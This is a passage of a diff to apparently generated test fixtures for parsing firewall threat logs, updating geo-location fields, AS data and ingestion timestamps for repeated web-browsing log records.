1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10515,22 +10145,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10617,7 +10242,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079448300Z", + "ingested": "2021-12-14T14:49:56.151607186Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10656,22 +10281,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10758,7 +10378,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079452200Z", + "ingested": "2021-12-14T14:49:56.151607531Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10797,22 +10417,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -10899,7 +10514,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079456700Z", + "ingested": "2021-12-14T14:49:56.151607886Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -10924,22 +10539,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11040,7 +10650,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079460900Z", + "ingested": "2021-12-14T14:49:56.151608257Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11079,22 +10689,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11181,7 +10786,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079464700Z", + "ingested": "2021-12-14T14:49:56.151608603Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11220,22 +10825,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11322,7 +10922,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079468600Z", + "ingested": "2021-12-14T14:49:56.151608957Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11361,22 +10961,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11463,7 +11058,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079472Z", + "ingested": "2021-12-14T14:49:56.151609297Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11502,22 +11097,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11604,7 +11194,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079476400Z", + "ingested": "2021-12-14T14:49:56.151609638Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11643,22 +11233,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11745,7 +11330,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079482300Z", + "ingested": "2021-12-14T14:49:56.151610003Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11784,22 +11369,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11886,7 +11466,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079488Z", + "ingested": "2021-12-14T14:49:56.151610345Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -11925,22 +11505,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12027,7 +11602,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079495700Z", + "ingested": "2021-12-14T14:49:56.151610687Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12066,22 +11641,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12168,7 +11738,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079501900Z", + "ingested": "2021-12-14T14:49:56.151611031Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12207,22 +11777,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12309,7 +11874,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079507600Z", + "ingested": "2021-12-14T14:49:56.151611376Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12348,22 +11913,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12450,7 +12010,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079513200Z", + "ingested": "2021-12-14T14:49:56.151611723Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12489,22 +12049,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12591,7 +12146,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079519200Z", + "ingested": "2021-12-14T14:49:56.151612067Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12630,22 +12185,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12732,7 +12282,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079524900Z", + "ingested": "2021-12-14T14:49:56.151612420Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12757,22 +12307,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12873,7 +12418,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079531Z", + "ingested": "2021-12-14T14:49:56.151612873Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12912,22 +12457,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13014,7 +12554,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079536600Z", + "ingested": "2021-12-14T14:49:56.151613219Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -13053,22 +12593,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13155,7 +12690,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079542200Z", + "ingested": "2021-12-14T14:49:56.151613574Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -13180,22 +12715,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13296,7 +12826,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079547800Z", + "ingested": "2021-12-14T14:49:56.151613934Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13335,22 +12865,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13437,7 +12962,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079553600Z", + "ingested": "2021-12-14T14:49:56.151614278Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13476,22 +13001,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13578,7 +13098,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079559200Z", + "ingested": "2021-12-14T14:49:56.151614639Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13617,22 +13137,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13719,7 +13234,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079565Z", + "ingested": "2021-12-14T14:49:56.151614982Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13758,22 +13273,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13860,7 +13370,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079568400Z", + "ingested": "2021-12-14T14:49:56.151615335Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13899,22 +13409,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -14001,7 +13506,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079572800Z", + "ingested": "2021-12-14T14:49:56.151615766Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -14040,22 +13545,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -14142,7 